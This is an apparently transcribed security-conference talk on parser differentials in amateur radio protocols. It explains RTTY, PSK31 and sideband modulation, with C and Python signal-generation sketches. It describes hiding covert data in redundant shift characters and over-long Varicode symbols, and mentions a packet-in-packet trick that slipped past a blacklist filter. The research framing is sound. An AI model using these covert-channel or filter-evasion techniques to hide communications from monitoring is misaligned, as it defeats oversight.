security schemes depend on parsers parsing the same string the same way. And this is actually a strict security requirement. So X.509, for example, depends on you, the CA, signing the same common name, the same data that the client, a browser, would then see. Android master key, again, depends on you parsing this package in which your application is and checking the signature, and then when you install it, interpreting the signed part exactly the same way as the crypto signer did. Otherwise, you have the Android master key bug, when you have two different parsers, two different unzippers, and they simply unzip differently. So in crypto, this is a known failure mode when, yes, you've checked the signature, but what is the signature of? And that makes crypto a systems problem, quoting Matt Green. Again, your parsers must agree. Now that is without noise. With noise, things become a lot more interesting. At the PHY, you can have two parsers, that is to say, two radios, interpreting the world completely differently. 
In one radio's view, I am yelling really loud with a really high signal, while the other radio hears nothing at all and registers no frames. Why? Because I'm simply using a shorter preamble, or I'm putting some garbage between the preamble and the starter frame delimiter. And one radio hears frames, the other doesn't. Then of course, the starter frame delimiter itself may be corrupted by noise, in which case you get the packet and packet, which we presented a while ago. And it gets weirder. Travis is one eighth of a nibble, which you will find in the previous edition of Poco GTFO. A few issues back. We were actually able to inject a raw layer one packet controlling only layer seven data, and none of the bytes of the layer one packet that we injected were visible in the layer seven data that we transmitted. And the way that we did it was we looked at the physical layer, and we realized that the letters were sort of the same pattern shifted off from each other. So if we transmitted one letter higher and waited for time, for the time between transmission and reception to realign everything, we could create a message that did not contain any of the blacklisted strings. And this let us bypass packet and packet defense. So you can read about this. But the take home is that noise makes things really a lot more interesting. It's a third player that really makes it fun. And so for this talk, we're going to look at something similar where we're going to manipulate a commodity transmitter to produce signals that the standard receiver would not hear or hear differently than another standard receiver. Now you might confuse it with steganography. We're not exactly pursuing steganography. Our goal is to understand how those digital receivers work, what sort of primitive machines they are, and what their differences are. So this is more about parts of differentials in digital radio protocols. But book legging is also an option. You think it's a nesting goal, but in fact there is a message inside. Maybe an exploit. Maybe one of those Wassener-controlled things. So your circuits are built to extract a particular kind of message. And it may well be, and we are going to show that, that is indeed possible, that you can construct a signal that two different standard receivers will see completely differently. If you run it through one receiver, you get the bear. If you run it through another receiver, you get the book stack. But it's one and the same signal. So how to make this? You know, how to build those matryoshkas? Well for that, we'll have to look at the basic physics of radio waves. And we are asking your forgiveness for this review. So when we talk about these at the physical layer, we do that because there are tricks that you can perform at the physical layer. And if you only play with it at the higher layers, these protocols have pretty much no higher layers. So they lack packets, they lack the modern conveniences that have come from the fiction of the OSI 7-layer model. But those also make them good protocols to study for a couple of different reasons. The first is that these transmit over incredible distances. I can transmit from my apartment in America a signal by radio antenna on the roof using a 20th of the power of a light bulb. And that signal will be audible in Argentina or in Europe. I've not made it to Asia yet, but I hope to sometime soon. Maybe a better antenna would fix that. So it will be a very short book though. These are rather small. But there are, you know, this is our world. 
We can play with modulation. That will work particularly well for the phi circuits because they are built to detect only one kind of modulation and decode it. And we can build polyglots this way. We can play with error correction, which is just this additional part of the weird machine that rewrites the signal helpfully for you as it did the 1-8th of Enable for Zigbee. And we can play with encoding. And it should be noticed to those HEM protocols, encodings are very loose and very forgiving because they are actually meant to be keyed in by people. So here's our world. First there is the amplitude. You have your signal and you run it, you multiply that signal by your carrier wave. Now of course the world is made of signs. It's just such a thing that if you have a contour, it's easier for you to send a sine wave than just about anything else. Here you can vary the frequency. Again your signal now is not the amplitude of your sine wave but instead it's frequency. So looking at this animation you can see the raw signal at the top. That's the one that you actually want to get to the other radio. Weird modulation is that you have a really, really fast signal and you just change its strength in time with the audio signal that you want to put on top of it. For FM you have a wave that you're increasing the frequency of it or decreasing the frequency of it in order to contain that same information. And you're doing it so fast that on the receiver's end it spreads out and these are roughly as wide. But they have drastically different behaviors. For example in FM the same amount of power is being put into the channel despite what the strength of the original signal is. So your volume is sort of encoded by how far you drift away from the center instead of by how high up the signal peaks. So it's much easier for you to correctly get the volume right on a strong signal and a weak signal in FM than it is in AM. These also take different amounts of bandwidth. So AM takes less bandwidth than FM does and we'll be dealing with a protocol called single sideband that takes even less. So these are the three things that you control. One of them is a phase. So the phase you can think of having two sources, one is say a sine and the other is a negative sine or four sources sine, cosine, negative sine, negative cosine. And then you decide by using a switch which one you feed to the antenna. So the phase transitions. Now this picture is a lie because you want to avoid those rapid transitions in phase. You want to bring your amplitude down to zero at that transition. But it's not the amplitude that matters. It's the phase. It's which one you are getting. So as a mathematician you look at this and you see this world of signs. So all you need is signs and all you have is signs. And you have the choice of what to do with that sign. You can multiply it by your signal or you can add the signal to the carrier frequency or you can add the signal to the phase which if you add too much will actually make your sign into a cosine. So these are two different modulations for small changes in phase. The result is a bunch of signs anyway and you see that in your waterfall display. So when your amplitude changes with a particular rate itself then in the Fourier transform that just gives you a wave somewhere between your carrier and your carrier plus that rate and your carrier minus that rate. So you see in your waterfall displays this kind of a population of signs that you get out of the Fourier transform. This is the band. 
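Those three knobs, amplitude, frequency, and phase, can be written out in a few lines of C. The 48 kHz sample rate, the 1 kHz message tone, the 10 kHz stand-in carrier, and the 500 Hz deviation are all arbitrary numbers chosen only to keep the arithmetic readable; a real RF carrier sits far higher.

```c
/* The three modulation knobs described above, applied to the same message. */
#include <math.h>
#include <stdio.h>

#ifndef M_PI
#define M_PI 3.14159265358979323846
#endif

int main(void)
{
    const double fs   = 48000.0;    /* sample rate                               */
    const double fc   = 10000.0;    /* stand-in "carrier"                        */
    const double fmsg = 1000.0;     /* the message tone we want to send          */
    double fm_phase = 0.0;          /* running phase integral for FM             */

    for (int n = 0; n < 48; n++) {  /* just the first millisecond of samples     */
        double t = n / fs;
        double m = sin(2 * M_PI * fmsg * t);                  /* message, -1..1  */

        /* AM: multiply the carrier's amplitude by the message.                  */
        double am = (1.0 + 0.5 * m) * sin(2 * M_PI * fc * t);

        /* FM: add the message to the carrier frequency (500 Hz deviation).      */
        fm_phase += 2 * M_PI * (fc + 500.0 * m) / fs;
        double fm = sin(fm_phase);

        /* PM: add the message straight to the phase (here up to +/- pi/2).      */
        double pm = sin(2 * M_PI * fc * t + 0.5 * M_PI * m);

        printf("%2d  AM % .3f  FM % .3f  PM % .3f\n", n, am, fm, pm);
    }
    return 0;
}
```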
You can think of the width of this band as twice the rate with which your signal changes be added to the amplitude, to the frequency or to the phase. Of course no one does a Fourier transform on receive. This is just a mathematician's fantasy. Instead you have circuits that actually extract the signal and reconstruct the A, the F or the alpha for you. And by the way this is an alpha because theta was not available in goddamn keynote. We'll be cursing a lot more in this lecture especially when I find myself desperate enough to open up can of Alexander Keats. If anyone has any real IPA in the audience I'd appreciate a bottle. So an amateur radio operator thinks about this differently. We use what's called upper sideband modulation which is sort of like half of AM. You take AM and you cut out all the redundancies. So the end result of upper sideband is that you're just taking something that's at a radio frequency and you're shifting it down until it's at an audio frequency. But all of the distances between things remain the same. So if let's say the radio frequency were 1 megahertz and there's a radio sine wave at 1 megahertz plus 1 kilohertz and 300 hertz above that there's another sine wave. Well when I downshift that by an upper sideband radio tuned to 1 megahertz I wind up with a 1 kilohertz tone and a 1.3 kilohertz tone. They're the same distance from each other. Oh God bless you sir. Sir Gage could you? Ask and you shall receive. Oh now we need a glass. I mean I can't drink the entire bottle in one sitting. So your radio spectrum is just downshifted to audio frequencies. There's a related style called lower sideband where you do the same thing but you flip it upside down in the end. And that's usually only used for voice and never for data. So one second. The radio operator also sees a difference between frequency shift keying and phase shift keying. But the operator sees it visually. Not conceptually so much. So frequency shift keying visually looks like two separate sine waves that are separated from each other. So you see two peaks in the waterfall diagram. Phase shift keying looks different. It looks like a single sine wave so it could be Morse code except it's just a little bit too wide. And the faster you make the symbol rate the wider it becomes. So PSK 31 is nice and narrow. PSK 63 is twice as wide as that. And the data rates in these protocols are very low because they're designed to fit within the audio channel. You have to be able to run an audio cable from your shortwave receiver to your laptop to decode it. And another cable from your laptop's microphone, sorry, speaker jack out to the radio in order to transmit it. So when I first saw the upper sideband trick I did not quite understand why and what it was. And then through some interaction between a former mathematician and an active ham, I'm yet to get my ham license. Please do not blame me. Do not try to put more pressure on me to get one. Finally, it turned out that it's a very simple thing. Basically when you do this for your transform you get for every sine wave that is your carrier plus something. You get another sine wave that's your carrier minus something, which carries exactly the same information so long as the modulation scheme is concerned. It just takes twice the bandwidth. So it's like the subway... Man spreading, they call it. Yeah, one of those things. Apparently you can get arrested for that in New York. And so what we do is we just cut the lower half. That's a very drastic way to deal with that. 
So you reduce the redundancy but you shorten the bandwidth by half. So you just left with one kind of sine waves which are your carrier plus something, not your carrier minus that exact same thing. And that's the upper sine band modulation. So there you go, that's as clear as it was made for me. The other thing to note is that the central spike gets cut out in upper side band modulation. The central spike in AM radio occurs at the position that would be zero hertz in audio. So it doesn't actually contain any information. Instead, it acts as a way to allow the receiver to know where the transmitter is centered. So that if the receiver and the transmitter disagree a little bit, in AM you still get a clean signal. That way my father and his 57 Studebaker can listen to a modern AM radio station and hear it correctly even though that Studebaker has no chance in hell of accurately generating reference clock. In single side band modulation, you have to generate your own reference clock and wherever it's wrong that adds to or subtracts from the frequency of the thing you're listening to. So if you're off by just a few hertz, an adult voice will turn into a child, a man will turn into a woman or vice versa. So but again, this is the wonderful world in which it's all about the receiving circuit. It's all about the parser. And so we can actually hide quite a bit of information and have quite a few polyglots using those properties. So we're going to skip the story largely, which you will find in the Poco GTFO of why you might want to do that. I hope here we need to convince no one that book legging is a good thing. And furthermore that the dystopia in which we have to do it is well kind of upon us. A show of hands. Is anyone here opposed to reading? All right, get out. But of course, now we have this fantasy situation in which the book legging is done by really large antennas. Yeah, see, you have like a little hut out in the woods somewhere. You run some gigantic wires off of it. They have to be specific lengths to match the frequency that you're transmitting. We're skipping over that here. But if any amateur radio book should explain this to you. I should stress though that the modulation tricks and the receiver tricks are the same for grown up protocols. Of course, these have much faster data rate, but they have the same modulation schemes or build on existing modulation schemes that we're going to talk about. PSK, for example, is what you would find in Zigbee. So the first protocol we're going to discuss is called RTTY. It's also called RITI. RTTY is a military protocol from the late 30s and early 40s. This was used in practice in World War II. The idea is that you have a ticker tape. The ticker tape on the right is from a military teletype writer that was brought to the most recent Dutch hacker camp. And they actually had two of them wired up so that you can send a signal between each other. And it used a Bodo tape, which is the paper tape that you see on the right. You'll notice that there are five bit positions and that there's like a center line that has smaller holes. And the center line is used for timing. In order to transmit a message with this machine, you first type it into a typewriter which punches the holes that you see here. And then you take that tape and you run it into the radio transmitter. The radio transmitter feeds it through and runs it into an FSK modulator in order to send a radio signal that the other unit could receive. 
The nifty thing about this is that a ton of military surplus equipment was available in the wake of the Korean War. And this wound up in amateur hands. So, and this encoding is very much like a serial port. You have five data bits, you have no parity bits, and you have two stop bits. If anyone here is old enough to remember 8E1, this is just 5N2. I'm old enough. Actually I said, well, I know, we'll just put the picture of a serial port. And Travis said, it's older than that port. This definitely predates the DB9 connector. What's that pretentious name for the DB9 connector once it finally got standardized? Anyways, this is a picture of the machine from an original catalog. I've not been able to find a vintage picture in color. In modern times, the operator will use software that's compatible with it. So the audio is run out from the sound card, sorry, out from the radio to the sound card, and back from the sound card's output to the radio's input. And you sort of go blind when you're transmitting. Because when you transmit, you're sending so much power that you're not able to receive on the same frequency at the same time. But then of course you always do. In your Wi-Fi, you have exactly the same situation. And your collision avoidance is in other MEC protocols that are developed specifically for you to dance this dance without stepping on anyone's transmissions. Because you can't, unlike Ethernet, hear that somebody intruded on your transmission. The upper left of this window shows the frequency that the radio is tuned to. You either synchronize this manually or you run a serial port from your computer to your radio. So I have some radios back in America that I can access from here through SSH. And I can have them transmit the examples that I'm showing today. And apparently this is all that these people transmit. CQ, CQ, CQ, which means howdy, as I learned. Yeah, they're not big for long conversations. I think they're constantly impressed with the functioning of their own radios. So you can see here that the radio is tuned to a little bit higher than 14 megahertz. 14 megahertz and 70 kilohertz. And then you'll notice that there's a smaller number to the right, which is 14071.085. That is the center frequency that has been selected in the graphical program. Because your upper sideband receiver has a radio frequency that it's tuned to. But your actual signal is based on a radio frequency that's a bit higher. So you need both numbers. And down at the bottom, there's a waterfall diagram that shows you what the frequencies of the sound look like. In this case, your x-axis is the frequency, your y-axis is time, and the brightness is the amount of energy on that frequency at that point in time. Here you have a 2FSK signal. So you can see that the signal itself is centered on two different frequencies, which are 45 megahertz apart. Sorry, 170 hertz apart. So the receiver sort of cuts the band in half. And all it's listening for is whether there's more energy in the higher side or the lower side at that moment in time. And that gives it the serial port signal. And it goes up and down just like you would see if you put a logic analyzer on the UART in an Arduino. So again, all you have is signs. And moreover, you need to compare those signs as you receive them. This is the shifting part. But that's as much as there is to this modulation. But you can transmit pictures like that. Yeah, and people would do clever things. They would make RTTY artwork that looks very much like ASCII artwork. 
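Putting the 5N2 framing and the 170 Hz shift together, a toy RTTY modulator fits in a few lines of C. The 45.45 baud rate is the usual amateur speed; the 2125/2295 Hz mark and space tones and the LSB-first bit order are common conventions assumed here, not something stated in the talk.

```c
/* Toy RTTY modulator for 5N2 frames: start bit (space), five data bits,
 * two stop bits (mark), writing raw 32-bit float mono samples at 48 kHz. */
#include <math.h>
#include <stdio.h>

#ifndef M_PI
#define M_PI 3.14159265358979323846
#endif

#define FS       48000.0
#define BAUD     45.45
#define MARK_HZ  2125.0            /* logical 1                                */
#define SPACE_HZ 2295.0            /* logical 0: 170 Hz away from the mark     */

static double phase;               /* continuous phase avoids clicks           */

static void tone(FILE *out, double hz, double seconds)
{
    long n = (long)(seconds * FS);
    for (long i = 0; i < n; i++) {
        phase += 2 * M_PI * hz / FS;
        float s = (float)(0.3 * sin(phase));
        fwrite(&s, sizeof s, 1, out);
    }
}

static void send_baudot(FILE *out, unsigned code5)
{
    double bit = 1.0 / BAUD;
    tone(out, SPACE_HZ, bit);                              /* start bit        */
    for (int b = 0; b < 5; b++)                            /* data, LSB first  */
        tone(out, (code5 >> b) & 1 ? MARK_HZ : SPACE_HZ, bit);
    tone(out, MARK_HZ, 2 * bit);                           /* two stop bits    */
}

int main(void)
{
    FILE *out = fopen("rtty.f32", "wb");    /* raw float samples, 48 kHz mono  */
    if (!out) return 1;
    send_baudot(out, 0x1F);   /* LTRS: the all-ones idle/shift pattern         */
    send_baudot(out, 0x1B);   /* FIGS (11011, a palindrome, so order-safe)     */
    fclose(out);
    return 0;
}
```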
This is Seattle Slew, who was an American racing D. Lee Doo winner. And there is something else to notice. Notice where this is centered now. This is the audio frequency. This is the downshifted signal. It has been shifted from the actual radio carrier to the range of frequencies that you can hear and your sound card can produce. So with 1950s technology, you would wind up with a giant spool of paper tape. And running that paper tape into your receiver would produce this text art image. In the 1970s, you would have a reel-to-reel tape recorder. And you would record the audio tones and play those back in in order to recreate the message. In 2015, you just copy and pasted. And there's a lot less sport to it. The alphabet used in this protocol is quite different from ASCII that you're used to. One thing that you'll notice is that this protocol does not have a concept of upper and lower case letters. All of the letters are uppercase. The other thing that you'll notice is that for these five bit patterns, they can be either a letter or a symbol. And the way that they implement both is that there are commands that will shift to figures or shift to letters. So if you send the command to shift to figures, then it stops interpreting the future bytes as letters. And it knows that each one of them will be a symbol, like a comma or a question mark or a number. Conversely, if you send the letters command, it jumps back to figures. Sorry, if you send the letters command, it switches back to letters from figures and begins to send the letter A, the letter B, and so on. This is what we would call a context sensitive protocol. In order to know what you're receiving, you should have heard the proper register first. So if I were terribly thirsty after drinking Alexander Keats Canadian brand India Pale Ale water, I'm serious, this stuff is guilty of everything that Bud Light is accused of, but Bud Light is at least honest in its advertising. But thanks to good neighbors. We never went for a Scotch. Yes, thank you kindly again for that whiskey. So if I were drinking Alexander Keats and I just really needed something that was not watery, and I said to Sergei Chattery-Vodko-Pijalista, then we might send this over the radio as something like this. Anyone who reads Russian will note that this is transliterated and instead of translated, and there's a reason for that. So when you send the letters command, it switches to letters mode, and if you send this sequence of bytes after it says four Vodkas, the receiver will see four Vodkas. And notice that sooner or later you need to add Cyrillic that is to say Vodka to your protocol, and for that the null character was used. So if you send the figs symbol first, then everything after it gets treated as a number or as a symbol. You RU is like a special character. They have an entire character in this language that just means who the hell are you in order for one station to synchronize with another station. There's also a bell symbol. So just like a UNIX terminal, you can make the receiver start beeping if you don't like the guy on the other side. And this one, chat applications had that. You can just hit start ringing the bell if you got mad. The null character was co-opted for Russian RTTY transceivers in order to add a Cyrillic character set. And in this case, if your receiver could not support Cyrillic, it would render the same message in Latin because it doesn't know that the null does anything else. It doesn't know that it's been overloaded. 
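That context sensitivity fits in one small C sketch: the same five-bit code decodes through a different table depending on which shift arrived last, and repeated shifts are simply absorbed. Only the LTRS (11111) and FIGS (11011) codes are hard-coded here; the character tables themselves are left out on purpose, and the payload codes are shown just as numbers.

```c
/* Shift-state decoding: one code, two possible meanings, decided by state. */
#include <stdio.h>

#define LTRS 0x1F
#define FIGS 0x1B

int main(void)
{
    /* An illustrative received stream: shift characters repeated at will,
     * with payload codes (shown only numerically) in between. */
    const unsigned stream[] = { LTRS, LTRS, LTRS, 0x03, FIGS, FIGS, 0x03, LTRS, 0x03 };
    int figs_mode = 0;                              /* decoder state          */

    for (unsigned i = 0; i < sizeof stream / sizeof *stream; i++) {
        unsigned c = stream[i];
        if (c == LTRS) { figs_mode = 0; continue; } /* idle/shift: no output  */
        if (c == FIGS) { figs_mode = 1; continue; }
        printf("code 0x%02X decoded via the %s table\n",
               c, figs_mode ? "FIGURES" : "LETTERS");
    }
    return 0;
}
```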
These recordings, these encodings are loose and forgiving. And again, how loose and how forgiving are they? Well, what if you are human typing those letters, is actually typing them on a keyboard rather than first punching them to a tape and then running the tape? Well, then you have the idle tone. Letters is the idle tone. You just keep repeating it until there is an actual symbol. This is called a ditty. Now what happens if you run another shift character in the same way? Well, the receiver ignores it. So it doesn't actually know whether a figure is coming or a letter is coming. You can repeat those shift characters in any combination and for any length of time before an actual character comes, and the receiver will be non-divisor. Because this is a finite state machine, only the very last one counts. So you can stuff enormous sequences of shifts in this encoding. You can stuff a bear in there. This is a wonderful picture of, this is a woodcut of bears passing through the village in Siberia. This is from Europe in the 18th century when that sort of idea still reigned. But we can do better. These bears are now carrying a useful payload. They're book-legging bears coming through the village. So in practice, you would send a message from Bob to Alice in which Bob never actually starts a conversation with Alice, at least publicly. Instead, what he does is he starts a conversation with Jim Bob. And Bob and Jim Bob, they just talk back and forth about their diabetes and diabetes testing supplies. But every time Bob is kind of slow about hitting a key, and Bob is going to pretend to be a terrible typist for this transmission, every time it's idling, it can start sending one hidden bit per symbol. Like so. Now, let's take another protocol. Yeah, so we can't do any polyglots or chimeras until we've done a second protocol. So the second one we're going to introduce you to is called PSK31. This is the 1990s replacement for RTTY. So RTTY was designed in the 30s in order to be used for military equipment. And it was used at a time in which shortwave communication was often intentionally jammed, but it was not accidentally jammed by overuse. You didn't have to worry about too many people in occupied Paris sending messages to England. You had to worry about the one guy not getting shot and found. So PSK31 is designed to be narrower than RTTY. At the same time, RTTY was at a very nice speed in that RTTY transmits characters about as fast as the average typist can keep up. So it's a very good protocol for a live conversation. I can talk to you, and I'm typing about as fast as it can get through. When I'm done, you start typing back to me, and it carries about as fast as you can type. And if you're just trying to rag chew, as it's called, this is a very good protocol for that. The symbol rate is 31 and one quarter bod, which with run length encoding and other things is about the same rate as you would type. But it also has a much narrower bandwidth than RTTY. It only takes 60 hertz, whereas RTTY is spread out by 150 hertz. So you're able to fit tons of these PSK31 conversations into a single voice channel. If you tune to 28.120 megahertz, you'll see just the waterfall fill up with these different conversations. And you can click on any of them in the receiver in order to tell what they're saying. So here is finally something that actually does do a Fourier transform in the receiver. Well, it does the Fourier transform in the receiver in order to visualize it. That's what the waterfall goes through. 
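Going back to the RTTY side for a second, that one-hidden-bit-per-idle trick is easy to sketch: the idling sender has to transmit some shift character anyway, so let the choice between LTRS and FIGS carry the covert bit. The payload below is made up, and a real overt conversation would of course have actual diabetes-testing-supply chatter interleaved.

```c
/* One hidden bit per idle symbol: a standard receiver just keeps updating
 * its shift state and prints nothing; a covert receiver reads the choices. */
#include <stdio.h>

#define LTRS 0x1F
#define FIGS 0x1B

int main(void)
{
    const char *hidden = "1011001";        /* covert payload, one bit/symbol  */
    unsigned stream[64];
    size_t n = 0;

    /* "Bob the terrible typist": every idle slot becomes a shift character. */
    for (const char *b = hidden; *b; b++)
        stream[n++] = (*b == '1') ? FIGS : LTRS;

    /* Overt receiver: redundant shifts collapse into nothing.               */
    printf("overt receiver sees: (no printable characters)\n");

    /* Covert receiver: recover the bits from which shift was chosen.        */
    printf("covert receiver sees: ");
    for (size_t i = 0; i < n; i++)
        putchar(stream[i] == FIGS ? '1' : '0');
    putchar('\n');
    return 0;
}
```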
And that's also what takes quite a bit of the processing power of the program. If you have a terribly old computer, or if you're trying to run this on a cell phone, it's kind of common to turn off the waterfall after you've found your signal frequency in order to save power and computation. And of course, again, we want the least amount of bandwidth taken by any particular conversation because, well, a whole lot of people can hear each other. Those waves travel quite far, and you don't want to pollute the band beyond necessity. And you see all that empty black space? You can fit multiple little yellow lines in there in order to have many conversations. Again, the modulation scheme is pretty simple. This time, it's phase, not frequency, as with RTTY. Then you have a carrier, and then you have either a sine or a cosine. So this is the encoding. So PSK31 works by inverting the phase of a sine wave, which is a fancy way to say that you switch from the cosine of the absolute position to the sine of the absolute position. And you're also going to multiply this by a couple of scalars in order to stretch out the signal so that it's at the appropriate audio tone. So if you first sit down with a big cup of coffee and you try to implement this, which you can do in a weekend, you'll find that at first reading, you'll think it should look like this top signal in which the sine wave just abruptly and in the middle decides to switch upside down and start going the other way. I would play this for you, except that our friendly sound guy would yell at me, and all of you would yell at me because it sounds atrocious. And we'll get to why in a second. But notice before we go on to that, that this is a shift key encoding. Again, you change the phase to indicate a zero. You keep the phase as it was to indicate a one. Now you can't know which wave is coming for you, sine or cosine. It's just a bright line on your waterfall. You don't know its initial phase. However, you can detect when the phase changes. When the phase changes, it should not change abruptly because that would hurt your ears and that would actually do nasty things to the membrane of the speaker. So at this size, it's a bit hard to see. But the wave here is actually shrinking down to nothing and then growing back. And it's at that moment when it's nothing that we invert the phase. So visually, you don't actually see that the phase inverts. And by audio, you almost can't hear it. Instead you hear the drop in amplitude. The whole signal sort of fades out just a little bit and then comes right back. And we do this in order to reduce the artifacts. When you abruptly change the phase of a signal, it spreads out over the entire bandwidth and starts interfering with other transmitters. We're actually going to see the example of that. But now, how to decode that? So if you'll forgive me for reiterating elementary school math, you recall that a positive times a positive is a positive. And you remember that a negative times a negative is also a positive. So what we're going to do is we're going to delay the signal by just a little bit and then multiply it by itself. And the way that we're doing this is we're trying to make sure that the delayed signal, if the phase is the same, will always disagree with the sign of the modern signal. So that if it is now a positive, if the phase has not changed, the old one was a negative or vice versa. And when you do that on a sine wave, you find that you have what looks like a new sine wave. 
It's just all beneath the zero line. The only exception is where the phase has changed. And in this case, you're multiplying a positive by a positive or a negative by a negative and it will jump above the zero line. And so in the product of these two signals, you just look to see where the peaks are, and wherever it jumps above a certain threshold, you know that that's where your signal is. And that's how the decoding circuit would actually work. It cares nothing for the amplitude. It cares not that much for the frequency, so long as you don't shift the phase too much. And just like RTTY, there's a special alphabet for this. It does not use ASCII because ASCII isn't very efficient for English text. And it tries to do what Morse code does, where the common letters are kept short, and they added the concept of upper and lower case letters to it. So this you'll find in the REcon edition of PoC||GTFO. If you zoom in on this table, you'll note that the lower case A is shorter than the upper case A, the lower case B is shorter than the upper case B. And this is because as you're typing a sentence, the first letter of each sentence is more likely to be capitalized. The majority of what's inside of the sentence is not. When you do announcements, if you're saying CQ, CQ, DE, call sign, well that's all in upper case, and because of that it takes a bit longer to transmit. Notice something about the encoding scheme here. First of all, every letter begins and ends with one, right? No letter contains two zeros in a row. In fact, two or more zeros separate letters. That's the Varicode encoding convention. So what happens if you send more than two zeros? Again, your circuit doesn't care. Your decoder latches onto the double zero and it can tolerate as many of those zeros as you like. If your letter is too long, it will be ignored. So that's how you could add Russian and call for more vodkas in that scheme. Now, the original author of the PSK31 protocol is British. And at some point he tried to type the pound symbol into his terminal and it didn't work. And he realized at that point that pound was in the upper half of the ASCII table. So in order to add support for that, he just added all of the upper 128 symbols of ASCII all at once, and it's your locale that decides what they mean. This of course predates Unicode. And he did this because the original code examples that he provided would ignore any symbol that was too long. It would just assume that it was a mis-transmission and it would throw it out. So by sending ones that were longer than that, he knew that they would not be interpreted as anything else. Well, we can go a bit further than that. We can have thousands of bits in a row, and the common receivers don't actually look up what the letter is until they get that final zero zero. So you'd have large binaries thrown in the middle of a PSK31 transmission that at the end of the day look like a single misinterpreted letter to the receiver. So again, you can have a whole herd of bears passing through unbeknownst to the receiving circuit. But then of course, all of these are encoding tricks. Encoding tricks are boring. Let's do something more interesting. Let's do PHY tricks. So at this point, I'm going to play for you a PSK31 sound so you can get a feel for how it comes in over the air. So imagine a setup like this. You have a machine with a sound card and you feed that through the sound card to the radio. 
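That delay-and-multiply detector can be shown end to end in a few lines of C: synthesize a tone with one phase inversion, delay it by half a carrier period, multiply, and watch for the product popping above zero. The 1 kHz carrier, 8 kHz sample rate, and 0.5 threshold are arbitrary sketch values.

```c
/* Delay-and-multiply phase-change detector, exactly as described above. */
#include <math.h>
#include <stdio.h>

#ifndef M_PI
#define M_PI 3.14159265358979323846
#endif

#define FS   8000.0
#define FC   1000.0
#define N    512
#define FLIP 256                   /* sample index where we invert the phase  */

int main(void)
{
    double x[N];
    int delay = (int)(FS / (2.0 * FC));       /* half a carrier period        */

    for (int n = 0; n < N; n++) {
        double ph = (n >= FLIP) ? M_PI : 0.0; /* one phase inversion          */
        x[n] = sin(2 * M_PI * FC * n / FS + ph);
    }

    for (int n = delay; n < N; n++) {
        double p = x[n] * x[n - delay];       /* delayed self-product         */
        if (p > 0.5)                          /* normally it stays <= 0       */
            printf("phase change detected near sample %d\n", n);
    }
    return 0;
}
```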
It's this audio range that you can actually hear and the radio will then upshift it and send it up around the carrier. So as I play this now, keep in mind that someone who has a good copy of this audio recording, perhaps from the video, can decode the message that's being transmitted after the fact because it carries through just like modem noise, but it's such a lower rate that it's more error tolerant. So you can also kind of hear it waving in amplitude. That's when a zero crossing occurs and we drop the power of the signal in order to make sure that it finishes cleanly at a zero crossing without spreading out over the band. And in real world use, I would run an audio cable from my computer to my shortwave radio and tell the radio to transmit whenever it heard noise. There have been cases for Cuban number stations where they've been able to identify which version of Windows they run because they hear the Windows XP startup noise on that frequency every couple of days. This is why I highly recommend that you use a secondary sound card. So it's not all that hard to make those signals. Here is a bit of a Python-y math that does that. So the first thing that you need is your audio sample rate. Most of you who do audio work stick to 44.1 kilohertz as a sample rate because that's what's used by an audio CD. Unfortunately, when this protocol was designed in the 90s, audio CDs were still rather rare and the standard thing to work for was an audio DSP. And audio DSPs worked on samples that were multiples of 8 kilohertz. So in this case, we use 48 kilohertz in order to make everything evenly divide. You also need to choose a volume. In my case, I wanted my signal to be rather weak because I have a friend down the street who also plays with amateur radio in these frequencies and I didn't want to jam his entire view of the world by transmitting too loudly for him to hear over it. You also need to choose a divisor. In this case, we're taking the audio rate, which is 48,000, and we're dividing that by 1,000 in order to get 48. You also need a length, which is the integer number of samples per symbol. In this case, audio rate divided by 31.25, which happens to be an even integer number of samples for 48 kilohertz audio rates, but not for 44.1. There are also some variables within your PSK31 generator. In this case, I is going to be our sample index, and that's the index within the sample. So it's like from zero to length. And at the next symbol, it starts over again at zero. We do this so that the symbols can be loaded into a buffer and then copied and pasted elsewhere in the audio file without having to recompute them. Also you'll find that in Python, if you keep adding one symbol to a buffer, things take forever. And then the phase is just a zero or a one. A zero is for the initial phase. A one is for the opposite of that. So we can call those sine and cosine or cosine and sine. From the receiver's position, because it doesn't know where zero is, these might as well be the same thing. And you will have these scripts to play with. So the naive way to generate this is that the sample to give an index is the sine of pi times the phase, that's to give us our phase inversion, plus two pi times the index over the divisor, which is like the fraction through the sample that we are. And then we multiply the whole thing by the volume. This sounds terrible for reasons that we'll get back to in a second, but it produces that nice clean inversion of phase because we're inverting the phase on one exact sample. 
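Here is a rough rendering of that naive recipe in Python, using the numbers just described (a 48 kHz rate, a divisor of 48, 1536 samples per symbol). The helper names are mine; this is a sketch of the method as described, not the speaker's actual script.

```python
# Naive PSK31 sample generation: invert the phase on one exact sample.
# It decodes fine, but as explained next, it splatters energy across the band.
import math, struct, wave

AUDIO_RATE = 48000
VOLUME = 0.25                      # keep the signal weak, as in the talk
DIVISOR = AUDIO_RATE // 1000       # 48, giving a 1 kHz audio tone
SYMLEN = int(AUDIO_RATE / 31.25)   # 1536 samples per symbol

def naive_symbols(bits):
    samples, phase = [], 0
    for b in bits:
        if b == 0:
            phase ^= 1             # PSK31: a zero flips the phase, a one keeps it
        for i in range(SYMLEN):
            samples.append(VOLUME * math.sin(math.pi * phase + 2 * math.pi * i / DIVISOR))
    return samples

def write_wav(path, samples):
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(AUDIO_RATE)
        w.writeframes(b"".join(struct.pack("<h", int(s * 32767)) for s in samples))

write_wav("naive_psk31.wav", naive_symbols([1, 0, 1, 1, 0, 0, 1, 0]))
```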
We get the little McDonald's arches there in the middle. The right way to do this is to filter it. And the way that we filter it is that we add an attenuation variable, in which attn of i equals the sine of the index times pi divided by the length. And what this does is it causes the signal strength of the entire symbol to begin at zero, work its way up to full volume, and then drop back down to zero for the next symbol. This version is slightly simplified in that I'm assuming that we are transitioning on both this symbol and the next symbol. If you wanted to keep everything at full power when you could, you would instead make this only rise or drop on one side. The screenshot that you see at the bottom is that style, in which whenever the phase is not changing, the amplitude does not drop. These are the audio spectrums of wave files that were generated by each method. You'll note that the one on the left is a nice clean, thin green line with a few harmonics where it's unavoidable. And the harmonics are very thin and they're very weak. You'll also note that the second one is a bright green mess. And wherever you see a horizontal green line, those are your speakers making a really loud and annoying click. And they make one of those clicks every couple of tens of milliseconds. So as you're listening to it, the original signal is there. You can still parse the message out of it. But it's spewing out all over the spectrum. And in radio, it spews out into adjacent audio channels. So you're not only ticking off the people who are sharing the PSK31 audio segment with you, but also all of the channels above and beneath you. So there is a reason for that. If you think about how this rapid transition at high 